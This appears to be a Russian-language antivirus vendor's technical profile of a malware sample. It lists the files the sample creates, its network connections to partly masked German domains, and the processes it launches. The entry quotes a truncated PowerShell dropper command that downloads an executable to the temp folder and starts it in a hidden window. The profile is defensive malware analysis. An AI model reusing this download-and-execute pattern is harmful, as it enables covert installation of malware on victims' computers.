Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $fvbugssvt как %temp%\gfka9.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function yiqha4([String] $Fvbugssvt){(New-Object System.Net.WebClient).DownloadFile($Fvbugssvt,''%TMP%\Gfka9.exe'');Start-Process ''%TMP%\Gfka9.exe'';}try{yiqha4(''...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 840
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- %TEMP%\pzg7.bat
- %TEMP%\1000543.cvr
Сетевая активность
Подключается к
- 'dr#####ei-schroll.de':80
- 'dr#####ei-schroll.de':443
- 'di###consult.de':80
TCP
Запросы HTTP GET
- http://dr#####ei-schroll.de/lensergiopd.png
Другие
- 'dr#####ei-schroll.de':443
UDP
- DNS ASK dr#####ei-schroll.de
- DNS ASK di###consult.de
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Pzg7.bat" " (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function yiqha4([String] $Fvbugssvt){(New-Object System.Net.WebClient).DownloadFile($Fvbugssvt,''%TMP%\Gfka9.exe'');Start-Process ''%TMP%\Gfka9.exe'';}try{yiqha4(''... (со скрытым окном)
